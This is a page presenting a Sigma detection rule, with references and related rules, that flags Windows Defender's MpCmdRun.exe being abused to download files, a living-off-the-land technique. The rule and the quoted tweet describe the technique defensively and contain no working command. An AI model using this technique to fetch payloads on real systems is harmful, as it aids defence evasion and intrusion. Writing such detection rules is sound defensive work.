File Download Via Windows Defender MpCmpRun.EXE
Detects the use of Windows Defender MpCmdRun.EXE to download files
Sigma rule (View on GitHub)
1title: File Download Via Windows Defender MpCmpRun.EXE
2id: 46123129-1024-423e-9fae-43af4a0fa9a5
3status: test
4description: Detects the use of Windows Defender MpCmdRun.EXE to download files
5references:
6 - https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866
7 - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
8author: Matthew Matchen
9date: 2020-09-04
10modified: 2023-11-09
11tags:
12 - attack.defense-evasion
13 - attack.t1218
14 - attack.command-and-control
15 - attack.t1105
16logsource:
17 category: process_creation
18 product: windows
19detection:
20 selection_img:
21 - OriginalFileName: 'MpCmdRun.exe'
22 - Image|endswith: '\MpCmdRun.exe'
23 - CommandLine|contains: 'MpCmdRun.exe'
24 - Description: 'Microsoft Malware Protection Command Line Utility'
25 selection_cli:
26 CommandLine|contains|all:
27 - 'DownloadFile'
28 - 'url'
29 condition: all of selection_*
30falsepositives:
31 - Unknown
32level: high
References
-
“While adding the Windows Defender MpCmdRun.exe to LOLBAS, I also discovered it can store the downloaded file into an Alternate Data Stream. Sweet stuff! Added here: https://t.co/a0DF4Qtlxe Also updated my ADS list: https://t.co/IRrOKIWPBo Great discovery by @mohammadaskar2”
Read More -
MpCmdRun.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More
Related rules
- Curl Download And Execute Combination
- Import LDAP Data Interchange Format File Via Ldifde.EXE
- Download from Suspicious Dyndns Hosts
- File Download Via Nscurl - MacOS
- Greenbug Espionage Group Indicators